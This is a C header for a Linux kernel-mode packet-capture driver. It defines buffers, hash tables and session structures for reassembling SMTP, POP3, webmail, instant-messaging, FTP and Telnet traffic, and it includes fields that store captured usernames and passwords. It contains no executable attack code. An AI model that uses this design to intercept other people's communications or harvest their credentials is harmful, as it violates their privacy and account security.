list.h

Linux下面截获以态网数据包！是在内核态下面运行的驱动程序

#ifndef __LIST_H_
#define __LIST_H_

/*	保存数据队列，为一环形队列　*/
#define	_MAX_PACKET_LEN		1520		//1518//1514
#define	_LONG_PACKET_LEN	1520		//1518//1514
#define	_SHORT_PACKET_LEN	100

#define	APP_TYPE_INIT			0X00000000
#define	APP_TYPE_SMTP			0X00000001
#define	APP_TYPE_POP3			0X00000002
#define	APP_TYPE_HTTP_MAIL		0X00000003
#define	APP_TYPE_DNS			0X00000004
#define	APP_TYPE_MSN			0X00000005
#define	APP_TYPE_QQ				0X00000006
#define	APP_TYPE_ICQ			0X00000007
#define	APP_TYPE_YAHOOMSG		0X00000008
#define	APP_TYPE_FTP			0X00000009
#define	APP_TYPE_TELNET			0X00000010
#define	APP_TYPE_HTTP_URL		0X00000011
#define	APP_TYPE_IRC			0X00000012
#define	APP_TYPE_PP				0X00000013
#define	APP_TYPE_GTALK			0X00000014
#define	APP_TYPE_AOL			0X00000015
#define	APP_TYPE_HTTP_POST		0X00000016
#define	APP_TYPE_TCP			0X10000000

#define SMTP_AUTH				"AUTH"
#define SMTP_USER				"USER"	//0x55534552
#define SMTP_PASS				"PASS"	//0x50415353
#define POP3_RETR				"RETR"	//0x52455452

#define POP3_USER_UINT		0x55534552
#define POP3_PASS_UINT		0x50415353
#define POP3_RETR_UINT		0x52455452
#define POP3_USER_UINT1		0x52455355
#define POP3_PASS_UINT1		0x53534150
#define POP3_RETR_UINT1		0x52544552

//will remove hashhead and write file
#define REMOVE_HASHHEAD_WRITE			(SMTP_HASH_TYPE_DOT|SMTP_HASH_TYPE_SEQ|SMTP_HASH_TYPE_FIN)
#define REMOVE_HASHHEAD_WRITE_OR_PART	(SMTP_HASH_TYPE_DOT|SMTP_HASH_TYPE_SEQ|SMTP_HASH_TYPE_FIN|SMTP_HASH_TYPE_PART)

//only write file but not remove hashhead
#define NON_REMOVE_HASHHEAD_WRITE		(SMTP_HASH_TYPE_DOT|SMTP_HASH_TYPE_SEQ|SMTP_HASH_TYPE_PART)
#define NON_REMOVE_HASHHEAD_WRITE_PREW 	(SMTP_HASH_TYPE_DOT|SMTP_HASH_TYPE_SEQ|SMTP_HASH_TYPE_PART|SMTP_HASH_TYPE_PREW)
#define ONE_OF_MAIL						(SMTP_HASH_TYPE_DOT|SMTP_HASH_TYPE_SEQ)

#define SERVER

#ifdef	SERVER

#define	_MAX_CYC_ARRAY_DEPTH		40000		//20000	30M	 60000 60M
#define	_MAX_UDP_CYC_ARRAY_DEPTH	40000		//20000	30M	 60000 60M
#define	_MAX_CYC_SAFE_NUMBER		500
#define	_MAX_LEISURE_POOL_DEPTH		70000
#define	_LONG_LEISURE_POOL_DEPTH	800000		//40%100M	 120000	360M 900000	1.5G	60000	180M 600000	1G
#define	_SHORT_LEISURE_POOL_DEPTH	800000		//60%100M	 180000	360M 1350000 1.5G	90000	180M 900000	1G 
#define	_HASH_HEAD_NUMBER			100000
#define	_BIG_MM						1024 * 1000	*	50
#define	_MAX_RULE_IP_HASH_BUCKET	4999

#else

#define	_MAX_CYC_ARRAY_DEPTH		4000
#define	_MAX_UDP_CYC_ARRAY_DEPTH	4000		//20000	30M	 60000 60M
#define	_MAX_CYC_SAFE_NUMBER		1			//100
#define	_MAX_LEISURE_POOL_DEPTH		1500
#define	_HASH_HEAD_NUMBER			1000
#define	_LONG_LEISURE_POOL_DEPTH	4000		//40%30000
#define	_SHORT_LEISURE_POOL_DEPTH	4000		//60%30000
#define	_MAX_RULE_IP_HASH_BUCKET	9			//4999

#endif//SERVER

#ifdef SERVER

#define _MAX_SMTP_HASH_BUCKET		9973//质数4999,9973,15451,19997,29989
#define _MAX_HTTP_HASH_BUCKET		9973
#define _MAX_MSN_HASH_BUCKET		9973
#define _MAX_HTTP_POST_BUCKET		9973
#define _MAX_FTP_HASH_BUCKET		499
#define _MAX_TELNET_HASH_BUCKET		499
#define _MAX_ICQ_HASH_BUCKET		499
#define _MAX_YAHOO_HASH_BUCKET		499
#define _MAX_IRC_HASH_BUCKET		499
#define _MAX_AOL_HASH_BUCKET		499
#define _MAX_PP_HASH_BUCKET			499
#define _MAX_GTALK_HASH_BUCKET		499

#define _MAX_IP_HASH_BUCKET			4999
#define _MAX_DOMAIN_HASH_BUCKET		4999

#else

#define _MAX_SMTP_HASH_BUCKET		499//质数4999,9973,
#define _MAX_HTTP_HASH_BUCKET		499
#define _MAX_MSN_HASH_BUCKET		499
#define _MAX_HTTP_POST_BUCKET		499
#define _MAX_FTP_HASH_BUCKET		99
#define _MAX_TELNET_HASH_BUCKET		99
#define _MAX_ICQ_HASH_BUCKET		99
#define _MAX_YAHOO_HASH_BUCKET		99
#define _MAX_IRC_HASH_BUCKET		99
#define _MAX_AOL_HASH_BUCKET		99
#define _MAX_PP_HASH_BUCKET			99
#define _MAX_GTALK_HASH_BUCKET		99

#define _MAX_IP_HASH_BUCKET			499
#define _MAX_DOMAIN_HASH_BUCKET		499

#endif//SERVER

typedef	struct _DOUBLE_LIST_ITEM
{
	struct _DOUBLE_LIST_ITEM	*pPre;
	struct _DOUBLE_LIST_ITEM	*pNext;
}DOUBLE_LIST_ITEM, *PDOUBLE_LIST_ITEM;


typedef	struct _DOUBLE_LIST_HEAD
{
	PDOUBLE_LIST_ITEM	pHead;
	PDOUBLE_LIST_ITEM	pTail;
	struct semaphore	fastMutex;
	unsigned int		iNumber;	//count	of the all item	
}DOUBLE_LIST_HEAD, *PDOUBLE_LIST_HEAD;

typedef	struct _SMTP_HASH_HEAD
{
	DOUBLE_LIST_ITEM	item;
	PDOUBLE_LIST_ITEM	pHead;
	PDOUBLE_LIST_ITEM	pTail;
	PDOUBLE_LIST_ITEM	pSeq;		//the	last item	of sequence
	
	//http
	PDOUBLE_LIST_ITEM	pSHead;
	PDOUBLE_LIST_ITEM	pSTail;
	PDOUBLE_LIST_ITEM	pSSeq;		//the	last item	of sequence	
	UINT				ruleID;
	USHORT				webMailType;

	PWEB_MAIL_CONFIG	pConfig;
	
	//end	http
	USHORT		sPort;
	UINT		sIP;
	UINT		dIP;
	
	union
	{
		USHORT	type;			//
		USHORT	webOldMailType;	//web mail	pre	mail type	== webMailType;
	};

#define	WEBMAIL_INIT			0X0000
#define	WEBMAIL_RECEIVE			0X0001
#define	WEBMAIL_SEND			0X0002	
#define	WEBMAIL_ATTACH			0X0100
#define	WEBMAIL_CON				0X0200
#define	WEBMAIL_ADDLIST			0X0004

#define	SMTP_HASH_TYPE_INIT		0X0000	
#define	SMTP_HASH_TYPE_DOT		0X0001		//one	mail end
#define	SMTP_HASH_TYPE_SEQ		0X0002		//order	packet
#define	SMTP_HASH_TYPE_FIN		0X0004		//FIN	session
#define	SMTP_HASH_TYPE_PART		0X0010		//one	of mails
#define	SMTP_HASH_TYPE_PREW		0X0020		//pre	write	disk
#define	SMTP_HASH_TYPE_DELETE	0X0040		//delete pre write file

#define	MSN_HASH_TYPE_INIT		0X0000
#define	MSN_HASH_TYPE_BEGIN		0X1000
#define	MSN_HASH_TYPE_END		0X2000

#define	IM_HASH_TYPE_LOGIN		0X0001
#define	IM_HASH_TYPE_LOGOUT		0X0002
#define	IM_HASH_TYPE_MSG		0X0004

	UINT			iNumber;				//count	of the all item	
	
	union
	{
		short 		iEml;					//count	of the emls	in this	session
		short  		iWebMail;				//count	of the web mail	in this	session
		short 		sUser_offset;			//IRC	SOURCE USER
	};
	
	USHORT			iFilePath;
	union
	{
		USHORT		iPart;					//sign the eml number	in one session
		short 		dUser_offset;			//IRC	DEST USER
	};
#define	_MAX_SMTP_HASH_PART_NUMBER		0	//3
	USHORT			iSeqCount;
		
	UINT			iSeqLen;

#define LINUX_X64

#ifdef	LINUX_X64

#define	_MAX_HASH_PRE_WRITE_COUNT	5
#define	_MAX_HASH_PRE_WRITE_LEN		5 * ( _LONG_PACKET_LEN ) - 1
	
#else

#define	_MAX_HASH_PRE_WRITE_COUNT	1
#define	_MAX_HASH_PRE_WRITE_LEN		1 * ( _LONG_PACKET_LEN ) - 1	

#endif

	struct timeval	timeStamp;			//the	first	packet time

	char	bPrew;		//sign of	Prew
	char 	bCrypt;

	// if bPrew is	true,then	the	follow packet's	seq	
	// must greater or	equal	this value
	UINT	nextSeqNumber;
	
	//http
	union
	{
		UINT	nextSSeqNumber;
		char	bCMsg;
	};

	union
	{
		UINT	cAck;
		char	bsuser;
	};
	
	union
	{
		UINT	sAck;
		char	bduser;
	};
	
	//end	http
	struct timeval	timelast;
	
	//control	file output
	union
	{
		char	bDelete;	//Delete the file
		char	bSMsg;
	};
	char		bFileHeader;	//the	eml	file header
	__u16		smtpPop3Type;	//same as	PACKET_DATA.type
	
#ifdef LINUX_X64

#define	_MAX_USER_LEN				48
#define	_MAX_PASS_LEN				48	

#else

#define	_MAX_USER_LEN				24
#define	_MAX_PASS_LEN				24	

#endif

#define	_MAX_MSN_USER_LEN			_MAX_USER_LEN
	__u16		iUserLen;		//用户名长度
	__u16		iPassLen;		//密码长度
	__u32		iPop3BeginSeq;
	
	//用户名
	union
	{
		char	user[_MAX_USER_LEN];
		char	suser[_MAX_MSN_USER_LEN];
	};
	
	//用户密码
	union
	{
		char	pass[_MAX_PASS_LEN];
		char	duser[_MAX_MSN_USER_LEN];
	};

	UINT		susTotalBytes;
}SMTP_HASH_HEAD, *PSMTP_HASH_HEAD;

typedef	struct _CTRL_THREAD_CTX
{
	char	bParserLoad;		//have be	load
	char	bParserUnload;	//unload parser
	char	bReady;
}CTRL_THREAD_CTX,	*PCTRL_THREAD_CTX;

typedef struct _PACKET_DATA
{
	UINT		len;			//total len ETHERNET+IP+TCP+data
	USHORT		dataLen;		//payload data len
	USHORT		dataOffset;		//from mac 
	UINT		nextSeqNumber;
	UINT		IPType;
	PWEB_MAIL_CONFIG pConfig;
	UINT		AppType;
	USHORT		type;			//sign the pop3/smtp or client/server type
	UINT		ruleID;
#define PACKET_TYPE_INIT			0X0000
#define PACKET_TYPE_SMTP			0X0001			//SMTP PACKET
#define PACKET_TYPE_POP3			0X0002			//POP3 PACKET
#define PACKET_TYPE_CLIENT			0X0100			//CLIENT PACKET
#define PACKET_TYPE_SERVER			0X0200			//SERVER PACKET

#define PACKET_TYPE_SMTP_CLIENT			(PACKET_TYPE_SMTP|PACKET_TYPE_CLIENT)
#define PACKET_TYPE_SMTP_SERVER			(PACKET_TYPE_SMTP|PACKET_TYPE_SERVER)
#define PACKET_TYPE_POP3_CLIENT			(PACKET_TYPE_POP3|PACKET_TYPE_CLIENT)
#define PACKET_TYPE_POP3_SERVER			(PACKET_TYPE_POP3|PACKET_TYPE_SERVER)

#define	WEB_MAIL_BEGIN_PACKET				0X1000
#define	WEB_MAIL_END_PACKET					0X2000

	char		buf[ _LONG_PACKET_LEN + 20 ];
}PACKET_DATA, *PPACKET_DATA;

typedef struct _SHORT_PACKET_DATA
{
	UINT		len;			//total len ETHERNET+IP+TCP+data
	USHORT		dataLen;		//payload data len
	USHORT		dataOffset;		//from mac 
	UINT		nextSeqNumber;
	UINT		IPType;
	PWEB_MAIL_CONFIG pConfig;
	UINT		AppType;	
	USHORT		type;			//sign the pop3/smtp or client/server type
	UINT		ruleID;
#define PACKET_TYPE_INIT			0X0000
#define PACKET_TYPE_SMTP			0X0001			//SMTP PACKET
#define PACKET_TYPE_POP3			0X0002			//POP3 PACKET
#define PACKET_TYPE_CLIENT			0X0100			//CLIENT PACKET
#define PACKET_TYPE_SERVER			0X0200			//SERVER PACKET

#define PACKET_TYPE_SMTP_CLIENT			(PACKET_TYPE_SMTP|PACKET_TYPE_CLIENT)
#define PACKET_TYPE_SMTP_SERVER			(PACKET_TYPE_SMTP|PACKET_TYPE_SERVER)
#define PACKET_TYPE_POP3_CLIENT			(PACKET_TYPE_POP3|PACKET_TYPE_CLIENT)
#define PACKET_TYPE_POP3_SERVER			(PACKET_TYPE_POP3|PACKET_TYPE_SERVER)

	char		buf[ 110 + 1 ];
}SHORT_PACKET_DATA, *PSHORT_PACKET_DATA;


#define IS_FROM_CLIENT( packet_type )			( (packet_type & PACKET_TYPE_CLIENT) )
#define IS_FROM_SERVER( packet_type )			( (packet_type & PACKET_TYPE_SERVER) )
#define IS_FROM_SMTP_CLIENT( packet_type )		( (packet_type & PACKET_TYPE_SMTP) && (packet_type & PACKET_TYPE_CLIENT))
#define IS_FROM_POP3_CLIENT( packet_type )		( (packet_type & PACKET_TYPE_POP3) && (packet_type & PACKET_TYPE_CLIENT))

typedef	struct _CYC_ARRAY_HEAD
{
	atomic64_t			iWrite;
	atomic64_t			iRead;
	PPACKET_DATA		PacketArray[ _MAX_CYC_ARRAY_DEPTH ];
}CYC_ARRAY_HEAD, *PCYC_ARRAY_HEAD;

typedef	struct _DOUBLE_LIST_PACKET
{
	DOUBLE_LIST_ITEM	doubleListItem;
	char				bDynamic;
	char				bLong;
	struct timeval		timeStamp;	//the	first	packet time
	PACKET_DATA			packet;
}DOUBLE_LIST_PACKET, *PDOUBLE_LIST_PACKET;


typedef struct _SHORT_DOUBLE_LIST_PACKET{
	DOUBLE_LIST_ITEM  	doubleListItem;
	char				bDynamic;
	char				bLong;
	struct timeval		timeStamp;
	SHORT_PACKET_DATA	packet;
}SHORT_DOUBLE_LIST_PACKET, *PSHORT_DOUBLE_LIST_PACKET;

#endif